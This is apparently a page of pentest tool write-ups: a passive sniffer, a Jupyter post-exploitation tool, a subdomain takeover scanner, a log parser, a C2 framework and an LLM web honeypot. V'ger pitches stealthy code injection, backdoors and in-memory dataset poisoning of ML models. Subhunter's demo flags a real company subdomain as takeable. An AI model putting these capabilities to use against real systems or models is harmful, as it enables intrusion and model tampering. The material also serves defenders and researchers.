Above is a invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. He's invisible. Completely based on the Scapy library.

Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.

Supported protocols

Detects up to 27 protocols:

MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Host Standby Redundancy Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)

Operating Mechanism

Above works in two modes:

  • Hot mode: Sniffing on your interface specifying a timer
  • Cold mode: Analyzing traffic dumps

The tool is very simple in its operation and is driven by arguments:

  • Interface: Specifying the network interface on which sniffing will be performed
  • Timer: Time during which traffic analysis will be performed
  • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
  • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
  • Passive ARP: Detecting hosts in a segment using Passive ARP
usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)

Information about protocols

The information obtained will be useful not only to the pentester, but also to the security engineer, he will know what he needs to pay attention to.

When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

  • Impact: What kind of attack can be performed on this protocol;

  • Tools: What tool can be used to launch an attack;

  • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

  • Mitigation: Recommendations for fixing the security problems

  • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


Installation

Linux

You can install Above directly from the Kali Linux repositories

caster@kali:~$ sudo apt update && sudo apt install above

Or...

caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install

macOS:

# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools

# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install

Don't forget to deactivate your firewall on macOS!

Settings > Network > Firewall


How to Use

Hot mode

Above requires root access for sniffing

Above can be run with or without a timer:

caster@kali:~$ sudo above --interface eth0 --timer 120

To stop traffic sniffing, press CTRL + Π‘

WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. Tool on tunneled L3 interfaces may not work properly.

Example:

caster@kali:~$ sudo above --interface eth0 --timer 120

-----------------------------------------------------------------------------------------
[+] Start sniffing...

[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------

If you need to record the sniffed traffic, use the --output argument

caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

If you interrupt the tool with CTRL+C, the traffic is still written to the file

Cold mode

If you already have some recorded traffic, you can use the --input argument to look for potential security issues

caster@kali:~$ above --input ospf-md5.cap

Example:

caster@kali:~$ sudo above --input ospf-md5.cap

[+] Analyzing pcap file...

--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication

Passive ARP

The tool can detect hosts without noise in the air by processing ARP frames in passive mode

caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

[+] Host discovery using Passive ARP

--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------

Outro

I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




☐ β˜† βœ‡ KitPloit - PenTest Tools!

Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

By: Zion3R β€” May 21st 2024 at 12:30

V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

User Stories

  • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
  • As a Red Teamer, you know that some browser-based actions will be visibile to the legitimate Jupyter users. For example, modifying tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
  • As an AI Red Teamer, you understand academic algorthmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. with V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
  • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

Usage

Initial Setup

  1. pip install vger
  2. vger --help

Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>. List available modules with vger --help.

Commands

Once a connection is established, users drop into a nested set of menus.

The top level menu is: - Reset: Configure a different host. - Enumerate: Utilities to learn more about the host. - Exploit: Utilities to perform direct action and manipulation of the host and artifacts. - Persist: Utilities to establish persistence mechanisms. - Export: Save output to a text file. - Quit: No one likes quitters.

These menus contain the following functionality: - List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code. - Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in runtime of the notebook. - Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root on a user-specified port with a user-specified password. - Check History: See ipython commands recently run in the target notebook. - Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal. - List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /. - Upload file: Upload file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension. - Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory). - Find models: Find models based on common file formats. - Download models: Download discovered models. - Snoop: Monitor notebook execution and results until timeout. - Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.

Experimental

With pip install vger[ai] you'll get LLM generated summaries of notebooks in the target environment. These are meant to be rough translation for non-DS/AI folks to do quick triage of if (or which) notebooks are worth investigating further.

There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").

Examples



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Subhunter - A Fast Subdomain Takeover Tool

By: Zion3R β€” May 15th 2024 at 12:30


Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.


Features:

  • Auto update
  • Uses random user agents
  • Built in Go
  • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

Installation:

Option 1:

Download from releases

Option 2:

Build from source:

$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go

Usage:

Options:

Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)

Demo (Added fake fingerprint for POC):

./Subhunter -l subdomains.txt -o test.txt

____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


A fast subdomain takeover tool

Created by Nemesis

Loaded 88 fingerprints for current scan

-----------------------------------------------------------------------------

[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable

Subhunter exiting...
Results written to test.txt




☐ β˜† βœ‡ KitPloit - PenTest Tools!

MasterParser - Powerful DFIR Tool Designed For Analyzing And Parsing Linux Logs

By: Zion3R β€” May 3rd 2024 at 12:30


What is MasterParser ?

MasterParser stands as a robust Digital Forensics and Incident Response tool meticulously crafted for the analysis of Linux logs within the var/log directory. Specifically designed to expedite the investigative process for security incidents on Linux systems, MasterParser adeptly scans supported logs, such as auth.log for example, extract critical details including SSH logins, user creations, event names, IP addresses and much more. The tool's generated summary presents this information in a clear and concise format, enhancing efficiency and accessibility for Incident Responders. Beyond its immediate utility for DFIR teams, MasterParser proves invaluable to the broader InfoSec and IT community, contributing significantly to the swift and comprehensive assessment of security events on Linux platforms.


MasterParser Wallpapers

Love MasterParser as much as we do? Dive into the fun and jazz up your screen with our exclusive MasterParser wallpaper! Click the link below and get ready to add a splash of excitement to your device! Download Wallpaper

Supported Logs Format

This is the list of supported log formats within the var/log directory that MasterParser can analyze. In future updates, MasterParser will support additional log formats for analysis. |Supported Log Formats List| | --- | | auth.log |

Feature & Log Format Requests:

If you wish to propose the addition of a new feature \ log format, kindly submit your request by creating an issue Click here to create a request

How To Use ?

How To Use - Text Guide

  1. From this GitHub repository press on "<> Code" and then press on "Download ZIP".
  2. From "MasterParser-main.zip" export the folder "MasterParser-main" to you Desktop.
  3. Open a PowerSehll terminal and navigate to the "MasterParser-main" folder.
# How to navigate to "MasterParser-main" folder from the PS terminal
PS C:\> cd "C:\Users\user\Desktop\MasterParser-main\"
  1. Now you can execute the tool, for example see the tool command menu, do this:
# How to show MasterParser menu
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Menu
  1. To run the tool, put all your /var/log/* logs in to the 01-Logs folder, and execute the tool like this:
# How to run MasterParser
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Start
  1. That's it, enjoy the tool!

How To Use - Video Guide

https://github.com/YosfanEilay/MasterParser/assets/132997318/d26b4b3f-7816-42c3-be7f-7ee3946a2c70

MasterParser Social Media Publications

Social Media Posts
1. First Tool Post
2. First Tool Story Publication By Help Net Security
3. Second Tool Story Publication By Forensic Focus
4. MasterParser featured in Help Net Security: 20 Essential Open-Source Cybersecurity Tools That Save You Time


☐ β˜† βœ‡ KitPloit - PenTest Tools!

C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

By: Zion3R β€” May 2nd 2024 at 12:30


The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

Reverse shells support:

  1. Reverse TCP
  2. Reverse HTTP
  3. Reverse HTTPS (configure it behind an LB)
  4. Telegram C2

Demo

C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk

Key Features

πŸ”’ Anywhere Access: Reach the C2 Cloud from any location.
πŸ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
πŸ–±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
πŸ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

Tech Stack

πŸ› οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
πŸ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
🌐 Nginx: Effortlessly routing traffic between web and backend systems.
πŸ“¨ Redis PubSub: Serving as a robust message broker for seamless communication.
πŸš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
πŸ’Ύ Postgres DB: Ensuring persistent storage for seamless continuity.

Architecture

Application setup

  • Management port: 9000
  • Reversse HTTP port: 8000
  • Reverse TCP port: 8888

  • Clone the repo

  • Optional: Update chait_id, bot_token in c2-telegram/config.yml
  • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.

Credits

Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

License

Distributed under the MIT License. See LICENSE for more information.

Contact



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Galah - An LLM-powered Web Honeypot Using The OpenAI API

By: Zion3R β€” April 29th 2024 at 12:30


TL;DR: Galah (/Ι‘Ι™Λˆlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


Description

Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

Future Enhancements

  • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

  • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

  • Support for Other LLMs.

Getting Started

  • Ensure you have Go version 1.20+ installed.
  • Create an OpenAI API key from here.
  • If you want to serve over HTTPS, generate TLS certificates.
  • Clone the repo and install the dependencies.
  • Update the config.yaml file.
  • Build and run the Go binary!
% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi

2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.

Example Responses

Here are some example responses:

Example 1

% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

JSON log record:

{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

Example 2

% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2

JSON log record:

{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

Okay, that was impressive!

Example 3

Now, let's do some sort of adversarial testing!

% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.`

JSON log record:

{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

πŸ˜‘

% curl http://localhost:8888/i-mean-are-you-a-fake-server`
No, I am not a fake server.

JSON log record:

{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

You're a galah, mate!



☐ β˜† βœ‡ KitPloit - PenTest Tools!

CSAF - Cyber Security Awareness Framework

By: Zion3R β€” April 26th 2024 at 12:30

The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing Cybersecurity" title="Cybersecurity">cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective Cybersecurity" title="Cybersecurity">cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational m aterials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.


Requirements

Software

  • Docker
  • Docker-compose

Hardware

Minimum

  • 4 Core CPU
  • 10GB RAM
  • 60GB Disk free

Recommendation

  • 8 Core CPU or above
  • 16GB RAM or above
  • 100GB Disk free or above

Installation

Clone the repository

git clone https://github.com/csalab-id/csaf.git

Navigate to the project directory

cd csaf

Pull the Docker images

docker-compose --profile=all pull

Generate wazuh ssl certificate

docker-compose -f generate-indexer-certs.yml run --rm generator

For security reason you should set env like this first

export ATTACK_PASS=ChangeMePlease
export DEFENSE_PASS=ChangeMePlease
export MONITOR_PASS=ChangeMePlease
export SPLUNK_PASS=ChangeMePlease
export GOPHISH_PASS=ChangeMePlease
export MAIL_PASS=ChangeMePlease
export PURPLEOPS_PASS=ChangeMePlease

Start all the containers

docker-compose --profile=all up -d

You can run specific profiles for running specific labs with the following profiles - all - attackdefenselab - phisinglab - breachlab - soclab

For example

docker-compose --profile=attackdefenselab up -d

Proof



Exposed Ports

An exposed port can be accessed using a proxy socks5 client, SSH client, or HTTP client. Choose one for the best experience.

  • Port 6080 (Access to attack network)
  • Port 7080 (Access to defense network)
  • Port 8080 (Access to monitor network)

Example usage

Access internal network with proxy socks5

  • curl --proxy socks5://ipaddress:6080 http://10.0.0.100/vnc.html
  • curl --proxy socks5://ipaddress:7080 http://10.0.1.101/vnc.html
  • curl --proxy socks5://ipaddress:8080 http://10.0.3.102/vnc.html

Remote ssh with ssh client

  • ssh kali@ipaddress -p 6080 (default password: attackpassword)
  • ssh kali@ipaddress -p 7080 (default password: defensepassword)
  • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

Access kali linux desktop with curl / browser

  • curl http://ipaddress:6080/vnc.html
  • curl http://ipaddress:7080/vnc.html
  • curl http://ipaddress:8080/vnc.html

Domain Access

  • http://attack.lab/vnc.html (default password: attackpassword)
  • http://defense.lab/vnc.html (default password: defensepassword)
  • http://monitor.lab/vnc.html (default password: monitorpassword)
  • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
  • https://server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)
  • https://server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)
  • https://mail.server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)
  • https://mail.server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)
  • http://phising.lab/
  • http://10.0.0.200:8081/
  • http://gitea.lab/ (default username: csalab, default password: giteapassword)
  • http://dvwa.lab/ (default username: admin, default passowrd: password)
  • http://dvwa-monitor.lab/ (default username: admin, default passowrd: password)
  • http://dvwa-modsecurity.lab/ (default username: admin, default passowrd: password)
  • http://wackopicko.lab/
  • http://juiceshop.lab/
  • https://wazuh-indexer.lab:9200/ (default username: admin, default passowrd: SecretPassword)
  • https://wazuh-manager.lab/
  • https://wazuh-dashboard.lab:5601/ (default username: admin, default passowrd: SecretPassword)
  • http://splunk.lab/ (default username: admin, default password: splunkpassword)
  • https://infectionmonkey.lab:5000/
  • http://purpleops.lab/ (default username: admin@purpleops.com, default password: purpleopspassword)
  • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

Network / IP Address

Attack

  • 10.0.0.100 attack.lab
  • 10.0.0.200 phising.lab
  • 10.0.0.201 server.lab
  • 10.0.0.201 mail.server.lab
  • 10.0.0.202 gophish.lab
  • 10.0.0.110 infectionmonkey.lab
  • 10.0.0.111 mongodb.lab
  • 10.0.0.112 purpleops.lab
  • 10.0.0.113 caldera.lab

Defense

  • 10.0.1.101 defense.lab
  • 10.0.1.10 dvwa.lab
  • 10.0.1.13 wackopicko.lab
  • 10.0.1.14 juiceshop.lab
  • 10.0.1.20 gitea.lab
  • 10.0.1.110 infectionmonkey.lab
  • 10.0.1.112 purpleops.lab
  • 10.0.1.113 caldera.lab

Monitor

  • 10.0.3.201 server.lab
  • 10.0.3.201 mail.server.lab
  • 10.0.3.9 mariadb.lab
  • 10.0.3.10 dvwa.lab
  • 10.0.3.11 dvwa-monitor.lab
  • 10.0.3.12 dvwa-modsecurity.lab
  • 10.0.3.102 monitor.lab
  • 10.0.3.30 wazuh-manager.lab
  • 10.0.3.31 wazuh-indexer.lab
  • 10.0.3.32 wazuh-dashboard.lab
  • 10.0.3.40 splunk.lab

Public

  • 10.0.2.101 defense.lab
  • 10.0.2.13 wackopicko.lab

Internet

  • 10.0.4.102 monitor.lab
  • 10.0.4.30 wazuh-manager.lab
  • 10.0.4.32 wazuh-dashboard.lab
